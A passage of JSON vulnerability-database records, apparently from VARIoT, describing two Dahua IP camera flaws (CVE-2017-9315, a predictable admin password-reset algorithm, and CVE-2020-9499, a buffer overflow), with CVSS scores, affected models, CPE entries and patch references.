"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd6xxxxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd6xxxxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9315"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kenney Lu Trend Micro",
"sources": [
{
"db": "ZDI",
"id": "ZDI-18-130"
}
],
"trust": 0.7
},
"cve": "CVE-2017-9315",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-9315",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-9315",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-38224",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-117518",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-9315",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-9315",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "ZDI",
"id": "CVE-2017-9315",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-38224",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201705-1393",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-117518",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "VULHUB",
"id": "VHN-117518"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Customer of Dahua IP camera or IP PTZ could submit relevant device information to receive a time limited temporary password from Dahua authorized dealer to reset the admin password. The algorithm used in this mechanism is potentially at risk of being compromised and subsequently utilized by attacker. Dahua IP Camera and IP PTZ Contains a cryptographic vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dahua Technology IP Camera. Authentication is not required to exploit this vulnerability.The specific flaw exists within the disaster recovery password functionality. If the device uses its default settings, the password generation algorithm produces a predictable result. An attacker can leverage this vulnerability to gain control of the device under attack. Dahua IPC-HFW and others are network camera equipment of Dahua Company of China. There are security vulnerabilities in several Dahua products. An attacker could use this vulnerability to reset the administrator password. Dahua IPC-HFW, etc. The following products are affected: Dahua IPC-HFW1XXX Build 2015/07 to 2017/03; IPC-HDW1XXX Build 2015/07 to 2017/03; IPC-HDBW1XXX Build 2015/07 to 2017/03; IPC- HFW2XXX Build 2015/07 to 2017/03; IPC-HDW2XXX Build 2015/07 to 2017/03; IPC-HDBW2XXX Build 2015/07 to 2017/03; IPC-HFW4XXX Build 2015/07 to 2017 /03 version; IPC-HDW4XXX Build 2015/07 to 2017/03 version; IPC-HDBW4XXX Build 2015/07 to 2017/03 version; IPC-HF5XXX Build 2015/07 to 2017/03 version; IPC-HFW5XXX Build 2015/07 to 2017/03; IPC-HDW5XXX Build 2015/07 to 2017/03; IPC-HDBW5XXX Build 2015/07 to 2017/03; IPC-HF8XXX Build 2015/07 to 2017/03 Version; IPC-HFW8XXX Build 2015/07 to 2017/03; IPC-HDBW8XXX Build 2015/07 to 2017/03; IPC-EBW8XXX Build 2015/07 to 2017/03; IPC-PFW8xxx Build 2015/ 07 version to 2017/03 version; IPC-PDBW8xxx Build 2015/07 version to 2017/03 version; IPC-HUM8xxx Build 2015/07 version to 2017/03 version",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "VULHUB",
"id": "VHN-117518"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9315",
"trust": 3.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-4956",
"trust": 0.7
},
{
"db": "ZDI",
"id": "ZDI-18-130",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-38224",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-117518",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "VULHUB",
"id": "VHN-117518"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"id": "VAR-201711-1047",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "VULHUB",
"id": "VHN-117518"
}
],
"trust": 1.580443946875
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38224"
}
]
},
"last_update_date": "2023-12-18T13:57:10.426000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/"
},
{
"title": "Dahua Technology has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "http://www.dahuasecurity.com/support/cybersecurity/annoucementnotice/152"
},
{
"title": "Patches for multiple Dahua product password reset vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/111791"
},
{
"title": "Multiple Dahua Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99835"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-310",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-117518"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "NVD",
"id": "CVE-2017-9315"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--admin-password-recovery-mechanism-in-some-dahua-ip-camera-and-ip-ptz-could-lead-to-security-risk_14731_221.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9315"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9315"
},
{
"trust": 0.7,
"url": "http://www.dahuasecurity.com/support/cybersecurity/annoucementnotice/152"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "VULHUB",
"id": "VHN-117518"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "VULHUB",
"id": "VHN-117518"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"date": "2017-12-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"date": "2017-11-28T00:00:00",
"db": "VULHUB",
"id": "VHN-117518"
},
{
"date": "2018-01-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"date": "2017-11-28T19:29:00.400000",
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"date": "2017-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"date": "2017-12-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-117518"
},
{
"date": "2018-01-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua IP Camera and IP PTZ Cryptographic vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
],
"trust": 0.6
}
}
VAR-202004-1823
Vulnerability from variot - Updated: 2023-12-18 13:51Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down. Dahua The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1823",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hx7842h",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n42b3p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd1a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n42b2p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52b3p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52b2p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52a4p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd50",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52b5p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hx5842h",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n42b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd5a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd6al",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n54a4p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hxxx5x4x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ptz1a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd52c",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n54b2p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hx2xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hx2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx5842h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx7842h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hxxx5x4x",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz1a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd1a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd50",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd52c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd5a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd6al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd 6al series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "sd 5a series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "sd 1a series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "sd 50/52c series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "nvr n5x series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "nvr n4x series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc n4 series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "NVD",
"id": "CVE-2020-9499"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
